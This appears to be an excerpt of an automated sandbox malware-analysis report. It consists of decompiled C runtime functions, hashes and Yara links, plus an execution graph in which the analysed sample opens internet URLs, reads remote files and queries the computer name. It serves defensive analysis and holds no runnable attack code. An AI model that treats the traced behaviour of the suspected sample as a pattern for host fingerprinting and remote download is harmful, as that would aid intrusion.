                                                                                                                                                              • Instruction Fuzzy Hash: 37F05421B08E4682FA45BF51B440475A675BF4C7A8FC84035EA1E13755CE7CD88FDB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E7B64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 27%
                                                                                                                                                              			E00007FF77FF7191E7B64(void* __ecx, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long _a8) {
				void* _t12;
				void* _t19;

				_t12 = __rax;
				_a8 = __rbx;
				E00007FF77FF7191E76B4(6, __rdx, "FlsSetValue", _t19, 0x19207d98, "FlsSetValue");
				if (_t12 == 0) goto 0x191e7ba4;
				 *0x191f94c0();
				goto 0x191e7baa;
				return TlsSetValue(??, ??);
			}





                                                                                                                                                              0x7ff7191e7b64
                                                                                                                                                              0x7ff7191e7b64
                                                                                                                                                              0x7ff7191e7b8d
                                                                                                                                                              0x7ff7191e7b9a
                                                                                                                                                              0x7ff7191e7b9c
                                                                                                                                                              0x7ff7191e7ba2
                                                                                                                                                              0x7ff7191e7bb4

                                                                                                                                                              APIs
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E7B8D
                                                                                                                                                              • TlsSetValue.KERNEL32(?,?,8000000000000000,00007FF7191E5C8A,?,?,8000000000000000,00007FF7191DC85D,?,?,?,?,00007FF7191E6B4D), ref: 00007FF7191E7BA4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Valuetry_get_function
                                                                                                                                                              • String ID: FlsSetValue
                                                                                                                                                              • API String ID: 738293619-3750699315
                                                                                                                                                              • Opcode ID: 8ca2924fb675c7228cb8675af2f38743f6d31f8deb06c7a567f99fdc55bb12f1
                                                                                                                                                              • Instruction ID: ae4f580d6456fe69da2fd4fd94659d76e19adc15a80da9b155fa3de0000d7535
                                                                                                                                                              • Opcode Fuzzy Hash: 8ca2924fb675c7228cb8675af2f38743f6d31f8deb06c7a567f99fdc55bb12f1
                                                                                                                                                              • Instruction Fuzzy Hash: 68E06561A08E4292FA457F54F8004B4A232BF487A8FD84031D51D06394DF3CD88FD230
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E7EA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E00007FF77FF7191E7EA8(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long _a8) {
				void* _t12;
				void* _t14;
				void* _t19;

				_t12 = __rax;
				_a8 = __rbx;
				_t14 = __rcx;
				E00007FF77FF7191E76B4(0x16, __rcx, "LocaleNameToLCID", _t19, 0x19207ea0, "LocaleNameToLCID");
				if (_t12 == 0) goto 0x191e7ee8;
				 *0x191f94c0();
				goto 0x191e7eed;
				return E00007FF77FF7191F21B0(_t12, _t14);
			}






                                                                                                                                                              0x7ff7191e7ea8
                                                                                                                                                              0x7ff7191e7ea8
                                                                                                                                                              0x7ff7191e7ebb
                                                                                                                                                              0x7ff7191e7ed1
                                                                                                                                                              0x7ff7191e7edc
                                                                                                                                                              0x7ff7191e7ee0
                                                                                                                                                              0x7ff7191e7ee6
                                                                                                                                                              0x7ff7191e7ef7

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DownlevelLocaleName__crttry_get_function
                                                                                                                                                              • String ID: LocaleNameToLCID
                                                                                                                                                              • API String ID: 404522899-2050040251
                                                                                                                                                              • Opcode ID: fa851c024783729c0d94a2e9fba027cb70d111ae2da4776651f9876f730b15e8
                                                                                                                                                              • Instruction ID: 7352038dcef7a9fc17458a894bc01f5ea75b8d5dc7878f048897909fa2e51f29
                                                                                                                                                              • Opcode Fuzzy Hash: fa851c024783729c0d94a2e9fba027cb70d111ae2da4776651f9876f730b15e8
                                                                                                                                                              • Instruction Fuzzy Hash: B9E03022A09D46A2FB46BF55B8400B5A6319F48368FDC5431E60D06251DE2CEC8ED260
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 00007FFF7F167608 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.432740619.00007FFF7F160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F160000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_7fff7f160000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 094448178b2b9da691cba62085e1f2893fe1e6d901e397081d5c9fe4a02d2e8e
                                                                                                                                                              • Instruction ID: 67c4d3292e92a6e84a262b450091c503fa2150c13e207cec8e5ba04b7768fa32
                                                                                                                                                              • Opcode Fuzzy Hash: 094448178b2b9da691cba62085e1f2893fe1e6d901e397081d5c9fe4a02d2e8e
                                                                                                                                                              • Instruction Fuzzy Hash: C531913191CB4C8FDB58DF5CA84A6A9BBE0FB99321F00422FE449D3651DB70A8558BC2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FFF7F161060 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.432740619.00007FFF7F160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F160000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_7fff7f160000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 017af4004552f0cd04338a9aff5d6dda54058b2ac635cdb48248b9cb29a47481
                                                                                                                                                              • Instruction ID: 297e22323e261afdb1810aadd0533a4976fd8079742a44b54eceb98f323e40fc
                                                                                                                                                              • Opcode Fuzzy Hash: 017af4004552f0cd04338a9aff5d6dda54058b2ac635cdb48248b9cb29a47481
                                                                                                                                                              • Instruction Fuzzy Hash: 4031D33291CB884FC346DB14D4509AABBE2EF85320F0446BBE089C72A6CF699905C782
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FFF7F167EFC Relevance: .1, Instructions: 101COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.432740619.00007FFF7F160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F160000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_7fff7f160000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1c876b1632d483edf836f6a995c40cd23767d22007005492887daaf0907801f1
                                                                                                                                                              • Instruction ID: a04afa730a0a29609bc150e1727f401e86faab1a3487ee9dd9dbc5aa7ef43b35
                                                                                                                                                              • Opcode Fuzzy Hash: 1c876b1632d483edf836f6a995c40cd23767d22007005492887daaf0907801f1
                                                                                                                                                              • Instruction Fuzzy Hash: 6721263190C74C8FEB59DBAC984A7E97FE0EB96330F00416BD049C3152DA74A416CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FFF7F162515 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.432740619.00007FFF7F160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F160000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_7fff7f160000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5946b1818df36f3fb9263da8c30d5c87073611620215c758df906eb386b8db71
                                                                                                                                                              • Instruction ID: e747ff36a17a1bd1c2bc02c4635a26bfd1dfda5d326c751b5de7f4d4f643543c
                                                                                                                                                              • Opcode Fuzzy Hash: 5946b1818df36f3fb9263da8c30d5c87073611620215c758df906eb386b8db71
                                                                                                                                                              • Instruction Fuzzy Hash: 3501677111CB0C4FDB44EF0CE451AA6B7E0FB95324F10056EE58AC3692DB36E882CB46
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FFF7F23414C Relevance: .0, Instructions: 41COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.433409369.00007FFF7F230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F230000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_7fff7f230000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ae5b253ec0c1f81e7c432143be9f9cb8a4588e7df91dd04711fff146e8843193
                                                                                                                                                              • Instruction ID: 8a80dd82917c27aebf4ccf6cb9b0beb65a52dfef44f6557624a2db255f0ddf3a
                                                                                                                                                              • Opcode Fuzzy Hash: ae5b253ec0c1f81e7c432143be9f9cb8a4588e7df91dd04711fff146e8843193
                                                                                                                                                              • Instruction Fuzzy Hash: 0AF0D133A1D9854FE368E71CA4015E8B7E0DF65330B0801FEE18EC70A3C925A841C781
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FFF7F167B58 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.432740619.00007FFF7F160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F160000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_7fff7f160000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1313ef5355a5270b806720513382989aefb449a532ced3f4b22e115c5ddcae70
                                                                                                                                                              • Instruction ID: 3155c510b6c830ce9f903d44a5090ecc8333bb29a511d542fc043b4dff4236e8
                                                                                                                                                              • Opcode Fuzzy Hash: 1313ef5355a5270b806720513382989aefb449a532ced3f4b22e115c5ddcae70
                                                                                                                                                              • Instruction Fuzzy Hash: 01F0963185C6C94FDB069F2888155D9BFE0EF57211F0902DBE458C71A2DB65A458CBD2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FFF7F236D1F Relevance: .0, Instructions: 34COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.433409369.00007FFF7F230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F230000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_7fff7f230000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 45cc8dadc877dfde586802d8887ae4ff98d3540e23e9345d781312698262a149
                                                                                                                                                              • Instruction ID: 12984241a92ece125e53e5cf3e6f01571cb5ab76d8eaf7936519c8671c60aa63
                                                                                                                                                              • Opcode Fuzzy Hash: 45cc8dadc877dfde586802d8887ae4ff98d3540e23e9345d781312698262a149
                                                                                                                                                              • Instruction Fuzzy Hash: B7F05E6290E58D4FE74297A864516E8BF90EF56260B0801FFD04992193C91564528791
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FFF7F234403 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.433409369.00007FFF7F230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F230000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_7fff7f230000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7046c4e25fc5c572a48cb781874e928c58c07be38fb268b76f37ec04630e932d
                                                                                                                                                              • Instruction ID: 68605c7cdd1e4b7b66d277e84adb14d64c67f106d857c52eff9cf675542cbcfc
                                                                                                                                                              • Opcode Fuzzy Hash: 7046c4e25fc5c572a48cb781874e928c58c07be38fb268b76f37ec04630e932d
                                                                                                                                                              • Instruction Fuzzy Hash: 7DF01C32A1C4088FD658EA1CE4419E8B7E0EF54325B5101FAE24EC75A2CA26EC518690
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FFF7F3B07D8 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.436175945.00007FFF7F3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F3B0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_7fff7f3b0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: eedacf35d48c627c3f0812febcf91a4f2c6d1f60275e71754b1a64c391cb04b8
                                                                                                                                                              • Instruction ID: 4f4ec04ded3b93897014618a6bfa924c1933f69af13ed64738f6213108fc4127
                                                                                                                                                              • Opcode Fuzzy Hash: eedacf35d48c627c3f0812febcf91a4f2c6d1f60275e71754b1a64c391cb04b8
                                                                                                                                                              • Instruction Fuzzy Hash: 89E09272E0D68C4FEB41E76864525FCFBE0EB59360F1801BFD05DE7193C929684287A1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FFF7F3B07C1 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.436175945.00007FFF7F3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F3B0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_7fff7f3b0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f33c73791213a1be06df556323b9cb0c342d2ec10789501ec40cc3b65becac9f
                                                                                                                                                              • Instruction ID: 881d17135f6243f147357d1fcfe87488d7b5223f28d142ba7c501ce0122b646b
                                                                                                                                                              • Opcode Fuzzy Hash: f33c73791213a1be06df556323b9cb0c342d2ec10789501ec40cc3b65becac9f
                                                                                                                                                              • Instruction Fuzzy Hash: C1E08C72A1965C8EAF50EBACA0018ECF7A0FF0C321B0400BBD908E7212CA36A4918790
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:5.8%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:755
                                                                                                                                                              Total number of Limit Nodes:39
                                                                                                                                                              execution_graph 25311 7ff6e4c6277c 25334 7ff6e4c62450 25311->25334 25314 7ff6e4c6279d __scrt_acquire_startup_lock 25317 7ff6e4c628dd 25314->25317 25319 7ff6e4c627bb 25314->25319 25315 7ff6e4c628d3 25355 7ff6e4c62f58 7 API calls 2 library calls 25315->25355 25356 7ff6e4c62f58 7 API calls 2 library calls 25317->25356 25320 7ff6e4c627e0 25319->25320 25325 7ff6e4c627fd __scrt_release_startup_lock 25319->25325 25342 7ff6e4c72a78 25319->25342 25321 7ff6e4c628e8 BuildCatchObjectHelperInternal 25323 7ff6e4c62866 25346 7ff6e4c7241c 25323->25346 25325->25323 25354 7ff6e4c71cf0 35 API calls __std_fs_directory_iterator_open 25325->25354 25326 7ff6e4c6286b 25352 7ff6e4c4e580 25326->25352 25357 7ff6e4c62da0 25334->25357 25337 7ff6e4c6247f 25359 7ff6e4c7299c 25337->25359 25341 7ff6e4c6247b 25341->25314 25341->25315 25343 7ff6e4c72aad 25342->25343 25344 7ff6e4c72ac7 25342->25344 25343->25344 25376 7ff6e4c62760 25343->25376 25344->25325 25347 7ff6e4c7242c 25346->25347 25351 7ff6e4c72441 25346->25351 25347->25351 25385 7ff6e4c720e4 45 API calls __free_lconv_mon 25347->25385 25349 7ff6e4c7244a 25349->25351 25386 7ff6e4c7229c 14 API calls 3 library calls 25349->25386 25351->25326 25387 7ff6e4c4eeb0 25352->25387 25354->25323 25355->25317 25356->25321 25358 7ff6e4c62472 __scrt_dllmain_crt_thread_attach 25357->25358 25358->25337 25358->25341 25360 7ff6e4c7f298 25359->25360 25361 7ff6e4c62484 25360->25361 25364 7ff6e4c7560c 25360->25364 25361->25341 25363 7ff6e4c64c88 7 API calls 2 library calls 25361->25363 25363->25341 25375 7ff6e4c6e128 EnterCriticalSection 25364->25375 25366 7ff6e4c7561c 25367 7ff6e4c7aa74 31 API calls 25366->25367 25368 7ff6e4c75625 25367->25368 25369 7ff6e4c75633 25368->25369 25370 7ff6e4c75410 33 API calls 25368->25370 25371 7ff6e4c6e17c _isindst LeaveCriticalSection 25369->25371 25372 7ff6e4c7562e 25370->25372 25373 7ff6e4c7563f 25371->25373 25374 7ff6e4c75500 GetStdHandle GetFileType 25372->25374 25373->25360 25374->25369 25384 7ff6e4c63100 SetUnhandledExceptionFilter 25376->25384 25385->25349 25386->25351 25388 7ff6e4c4eef2 25387->25388 25450 7ff6e4c4a9a0 25388->25450 25390 7ff6e4c4ef30 25466 7ff6e4c4dd20 InternetOpenA 25390->25466 25395 7ff6e4c4f09d 25397 7ff6e4c4a9a0 32 API calls 25395->25397 25398 7ff6e4c4f0df 25397->25398 25400 7ff6e4c4a9a0 32 API calls 25398->25400 25399 7ff6e4c4f01a 25399->25399 25401 7ff6e4c4a9a0 32 API calls 25399->25401 25402 7ff6e4c4f10f 25400->25402 25401->25395 25407 7ff6e4c4f132 _Yarn 25402->25407 25533 7ff6e4c4fa10 32 API calls 4 library calls 25402->25533 25405 7ff6e4c4f20b 25505 7ff6e4c4f820 25405->25505 25500 7ff6e4c4ab00 25407->25500 25408 7ff6e4c4f23a 25409 7ff6e4c4ab00 32 API calls 25408->25409 25410 7ff6e4c4f251 25409->25410 25411 7ff6e4c4f820 32 API calls 25410->25411 25422 7ff6e4c4f281 25411->25422 25412 7ff6e4c4f66d 25414 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25412->25414 25413 7ff6e4c4f673 25415 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25413->25415 25414->25413 25416 7ff6e4c4f679 25415->25416 25417 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25416->25417 25418 7ff6e4c4f67f 25417->25418 25419 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25418->25419 25420 7ff6e4c4f685 25419->25420 25421 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25420->25421 25423 7ff6e4c4f68b 25421->25423 25422->25412 25422->25413 25422->25416 25422->25418 25422->25420 25422->25423 25424 7ff6e4c4f691 25422->25424 25425 7ff6e4c4f4c5 25422->25425 25426 7ff6e4c4f4f1 25422->25426 25431 7ff6e4c4f48d _Yarn 25422->25431 25427 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25423->25427 25430 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25424->25430 25429 7ff6e4c4f697 25425->25429 25534 7ff6e4c623d8 25425->25534 25426->25431 25432 7ff6e4c623d8 std::_Facet_Register 32 API calls 25426->25432 25427->25424 25557 7ff6e4c41260 32 API calls 2 library calls 25429->25557 25430->25429 25438 7ff6e4c4f6a3 25431->25438 25519 7ff6e4c49e00 25431->25519 25432->25431 25433 7ff6e4c4f531 25437 7ff6e4c4dd20 38 API calls 25433->25437 25436 7ff6e4c4f69d 25439 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25436->25439 25444 7ff6e4c4f53f 25437->25444 25440 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25438->25440 25439->25438 25441 7ff6e4c4f6a9 25440->25441 25442 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25441->25442 25443 7ff6e4c4f6af 25442->25443 25444->25436 25444->25438 25444->25441 25445 7ff6e4c4f633 25444->25445 25447 7ff6e4c4f668 25444->25447 25543 7ff6e4c623b0 25445->25543 25552 7ff6e4c6a5f8 25447->25552 25452 7ff6e4c4a9be _Yarn 25450->25452 25454 7ff6e4c4a9ea 25450->25454 25452->25390 25453 7ff6e4c4aafb 25455 7ff6e4c4aa48 25454->25455 25458 7ff6e4c4aa74 25454->25458 25465 7ff6e4c4aaf5 25454->25465 25456 7ff6e4c4aaea 25455->25456 25457 7ff6e4c4aa55 25455->25457 25558 7ff6e4c41260 32 API calls 2 library calls 25456->25558 25459 7ff6e4c623d8 std::_Facet_Register 32 API calls 25457->25459 25461 7ff6e4c623d8 std::_Facet_Register 32 API calls 25458->25461 25462 7ff6e4c4aa5d _Yarn 25458->25462 25459->25462 25461->25462 25463 7ff6e4c4aacb 25462->25463 25464 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25462->25464 25463->25390 25464->25465 25559 7ff6e4c41300 32 API calls __std_exception_copy 25465->25559 25467 7ff6e4c4de0f InternetOpenUrlA 25466->25467 25477 7ff6e4c4dd86 25466->25477 25471 7ff6e4c4df6b InternetCloseHandle 25467->25471 25479 7ff6e4c4de41 _Yarn memcpy_s 25467->25479 25469 7ff6e4c4ddca 25470 7ff6e4c623b0 _handle_errorf 8 API calls 25469->25470 25472 7ff6e4c4ddf4 25470->25472 25473 7ff6e4c4a9a0 32 API calls 25471->25473 25485 7ff6e4c4dfe0 25472->25485 25473->25477 25474 7ff6e4c4dfba 25476 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25474->25476 25475 7ff6e4c4de70 InternetReadFile 25475->25479 25478 7ff6e4c4dfd7 25476->25478 25477->25469 25477->25474 25481 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25478->25481 25479->25471 25479->25475 25483 7ff6e4c4df0d InternetCloseHandle InternetCloseHandle 25479->25483 25560 7ff6e4c4ca80 32 API calls 4 library calls 25479->25560 25482 7ff6e4c4dfdd 25481->25482 25483->25469 25484 7ff6e4c4df3e 25483->25484 25484->25469 25484->25471 25484->25478 25561 7ff6e4c64a30 25485->25561 25488 7ff6e4c4e1bc 25490 7ff6e4c623b0 _handle_errorf 8 API calls 25488->25490 25489 7ff6e4c4e02e CoInitializeSecurity 25491 7ff6e4c4e1b6 CoUninitialize 25489->25491 25492 7ff6e4c4e068 CoCreateInstance 25489->25492 25493 7ff6e4c4e1c8 lstrcpyA GetComputerNameW 25490->25493 25491->25488 25492->25491 25494 7ff6e4c4e098 25492->25494 25493->25395 25493->25399 25495 7ff6e4c623d8 std::_Facet_Register 32 API calls 25494->25495 25496 7ff6e4c4e0b1 25495->25496 25496->25491 25497 7ff6e4c4e558 25496->25497 25498 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25497->25498 25499 7ff6e4c4e573 25498->25499 25501 7ff6e4c4ab62 25500->25501 25503 7ff6e4c4ab23 _Yarn 25500->25503 25563 7ff6e4c4ca80 32 API calls 4 library calls 25501->25563 25503->25405 25504 7ff6e4c4ab78 25504->25405 25506 7ff6e4c4f86a 25505->25506 25508 7ff6e4c4f96a 25506->25508 25509 7ff6e4c4f992 25506->25509 25511 7ff6e4c4f86f _Yarn 25506->25511 25518 7ff6e4c4f9fa 25506->25518 25510 7ff6e4c4fa00 25508->25510 25512 7ff6e4c623d8 std::_Facet_Register 32 API calls 25508->25512 25509->25511 25513 7ff6e4c623d8 std::_Facet_Register 32 API calls 25509->25513 25565 7ff6e4c41260 32 API calls 2 library calls 25510->25565 25511->25408 25516 7ff6e4c4f97f 25512->25516 25513->25511 25515 7ff6e4c4fa06 25516->25511 25517 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25516->25517 25517->25518 25564 7ff6e4c41300 32 API calls __std_exception_copy 25518->25564 25520 7ff6e4c49e2d 25519->25520 25521 7ff6e4c49e6d 25520->25521 25522 7ff6e4c49e94 25520->25522 25524 7ff6e4c49e3b _Yarn 25520->25524 25523 7ff6e4c49ed5 25521->25523 25526 7ff6e4c623d8 std::_Facet_Register 32 API calls 25521->25526 25522->25524 25527 7ff6e4c623d8 std::_Facet_Register 32 API calls 25522->25527 25566 7ff6e4c41260 32 API calls 2 library calls 25523->25566 25524->25433 25529 7ff6e4c49e7e 25526->25529 25527->25524 25528 7ff6e4c49edb 25567 7ff6e4c481b0 67 API calls 25528->25567 25529->25524 25531 7ff6e4c6a5f8 _invalid_parameter_noinfo_noreturn 30 API calls 25529->25531 25531->25523 25532 7ff6e4c49ef4 25532->25433 25533->25407 25538 7ff6e4c623e3 25534->25538 25535 7ff6e4c623fc 25535->25431 25537 7ff6e4c62402 25539 7ff6e4c6240d 25537->25539 25569 7ff6e4c60f1c RtlPcToFileHeader _purecall Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25537->25569 25538->25535 25538->25537 25568 7ff6e4c71868 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 25538->25568 25570 7ff6e4c41260 32 API calls 2 library calls 25539->25570 25542 7ff6e4c62413 25544 7ff6e4c623b9 25543->25544 25545 7ff6e4c4f647 25544->25545 25546 7ff6e4c62a3c IsProcessorFeaturePresent 25544->25546 25547 7ff6e4c62a54 25546->25547 25571 7ff6e4c62c30 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25547->25571 25549 7ff6e4c62a67 25572 7ff6e4c62a08 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25549->25572 25573 7ff6e4c6a528 30 API calls 2 library calls 25552->25573 25554 7ff6e4c6a611 25574 7ff6e4c6a628 17 API calls BuildCatchObjectHelperInternal 25554->25574 25557->25436 25558->25462 25559->25453 25560->25479 25562 7ff6e4c4e01c CoInitializeEx 25561->25562 25562->25488 25562->25489 25563->25504 25564->25510 25565->25515 25566->25528 25567->25532 25568->25538 25570->25542 25571->25549 25573->25554 25575 7ff6e4c615d8 25579 7ff6e4c6163e 25575->25579 25576 7ff6e4c6168d 25577 7ff6e4c61680 25580 7ff6e4c61685 25577->25580 25583 7ff6e4c6d4e8 25577->25583 25579->25576 